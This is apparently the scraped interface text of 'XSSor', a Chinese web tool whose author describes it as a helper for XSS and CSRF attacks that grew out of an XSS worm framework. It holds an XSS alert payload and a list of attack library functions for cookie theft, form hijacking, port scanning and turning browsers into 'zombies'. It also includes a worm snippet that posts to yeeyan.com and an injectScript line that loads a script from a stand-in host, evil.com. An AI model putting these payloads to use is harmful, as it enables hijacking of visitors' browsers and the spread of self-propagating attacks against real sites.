正在加载……
Encode/Decode
XSSCodz
CSRFCodz
WormAction
RemoteControl
About
<script>x=alert;x(/xssor/.source);</script>
\u
&#x;
,
c
&#
&#;
↔
↔
↔
↔
↔
→
AttackAPI LIB
.core.bindFunction
.core.clone
.core.extend
.dom.attachEvent
.dom.delCookie
.dom.freeze
.dom.getAgent
.dom.getClipboard
.dom.getCookie
.dom.getCookies
.dom.getDocument
.dom.getInternalHostname
.dom.getInternalIP
.dom.getInternalNetworkInfo
.dom.getPlatform
.dom.getPlugins
.dom.getXHR
.dom.hijackEval
.dom.hijackForm
.dom.hijackView
.dom.include
.dom.parseXML
.dom.request
.dom.requestCSRF
.dom.requestIMG
.dom.requestIMGL
.dom.requestJS
.dom.requestJSL
.dom.requestJSON
.dom.requestLC
.dom.requestXML
.dom.requestXSS
.dom.requestXSSL
.dom.scanExtensions
.dom.scanHistory
.dom.scanPorts
.dom.searchGoogle
.dom.setClipboard
.dom.setCookie
.dom.signatures
.dom.spawnChannel
.dom.spawnSandbox
.dom.spawnZombie
.dom.spider
.dom.sweepPorts
.dom.transport
.dom.triggerEvent
.dom.zombiefy
.dom.zombiefyL
.utils.buildDomain
.utils.buildJSON
.utils.buildQuery
.utils.buildURL
.utils.decodeBase64
.utils.decodeURL
.utils.encodeBase64
.utils.encodeMD5
.utils.encodeURL
.utils.ip2number
.utils.net2range
.utils.number2ip
.utils.packJS
.utils.parseDomain
.utils.parseJSON
.utils.parseQuery
.utils.parseURL
.utils.range2net
src="http://www.yeeyan.com/groups/newTopic/" title="xss" content="from xss worm:)"
Content-Type
multipart/form-data
application/x-www-form-urlencoded
injectScript('http://www.evil.com:8888/web2ghost/lib/inject.js'); setTimeout("injectIframe('http://www.baidu.com')",1000);
CSRF Type
GET
POST
CSRF Language
JavaScript
Flash AS3
ASP
PHP
Python
跨域获取数据
Flash AS3
ASP
PHP
Python
JSON Hijacking
方便XSS与CSRF的工具,并且会集成更多的好想法。
2008-04-05写的雏形,当时的定位是XSS Worm Framework,目前改进了不少,不过还远不够强大。
后端使用PHP,前端与后端的交互都AJAX化了:)
by cosine, mail:
[email protected]